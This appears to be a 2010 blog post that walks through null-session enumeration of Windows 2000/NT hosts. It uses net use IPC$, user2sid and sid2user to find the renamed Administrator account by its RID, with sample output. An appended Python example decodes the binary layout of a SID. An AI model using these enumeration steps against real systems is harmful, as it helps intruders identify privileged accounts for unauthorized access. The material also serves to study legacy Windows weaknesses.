Tuesday, June 1, 2010

Gaining Access

Manipulating Guest account
Victim Platform: Windows 2000/NT.
Create a null session on the victim:
C:\PSEUDO>net use \\ipaddress\IPC$ "" /user:""

After "The command completed successfully." is returned, run user2sid against the Guest account:
C:\PSEUDO>user2sid \\10.2.18.205 Guest

S-1-5-21-602162358-152049171-839522115-501

Number of subauthorities is 5
Domain is U0401
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

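Copy: 5-21-602162358-152049171-839522115-501
The last field is the relative identifier (RID): 501 is the built-in Guest account and 500 is the built-in Administrator account. Replace -501 with -500 as below and pass the fields, separated by spaces, to sid2user: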

C:\PSEUDO>sid2user \\10.2.18.205 5 21 602162358 152049171 839522115 500

Name is Administrator
Domain is U0401
Type of SID is SidTypeUser

Clean up by deleting the connection:
C:\PSEUDO>net use \\ipaddress /delete
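
The fields user2sid prints above (5 subauthorities, 28 bytes in memory, RID 501) follow directly from the binary layout of a SID. The following is an added example, not part of the original post, that encodes the SID string and recovers those fields; the function names and the small RID table are assumptions of this example.

```python
import struct

# Well-known relative identifiers (RIDs) for built-in accounts.
WELL_KNOWN_RIDS = {500: "Administrator (built-in)", 501: "Guest (built-in)"}


def sid_to_bytes(sid: str) -> bytes:
    """Encode a string SID (S-R-I-S1-S2-...) into its binary layout."""
    parts = sid.strip().split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or len(subs) > 15:
        raise ValueError("unsupported revision or too many subauthorities")
    if not 0 <= authority < 1 << 48 or any(not 0 <= s < 1 << 32 for s in subs):
        raise ValueError("field out of range")
    # 1 byte revision, 1 byte subauthority count, 6 byte big-endian authority,
    # then one little-endian 32-bit value per subauthority.
    header = struct.pack(">BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return header + struct.pack(f"<{len(subs)}I", *subs)


def describe_sid(sid: str) -> dict:
    """Return the fields user2sid reports, derived from the binary form."""
    raw = sid_to_bytes(sid)
    count = raw[1]
    subs = list(struct.unpack_from(f"<{count}I", raw, 8))
    rid = subs[-1] if subs else None
    return {
        "subauthority_count": count,
        "length_in_memory": len(raw),  # 8-byte header + 4 bytes per subauthority
        "domain_identifier": "-".join(str(s) for s in subs[:-1]),
        "rid": rid,
        "well_known": WELL_KNOWN_RIDS.get(rid, "not a built-in RID listed here"),
    }


if __name__ == "__main__":
    # SID copied from the user2sid output above.
    sid = "S-1-5-21-602162358-152049171-839522115-501"
    for key, value in describe_sid(sid).items():
        print(f"{key}: {value}")
```

The domain identifier is the same for every account in the domain and only the RID differs, which is why the built-in Administrator account keeps RID 500 and can be identified by SID even after it has been renamed.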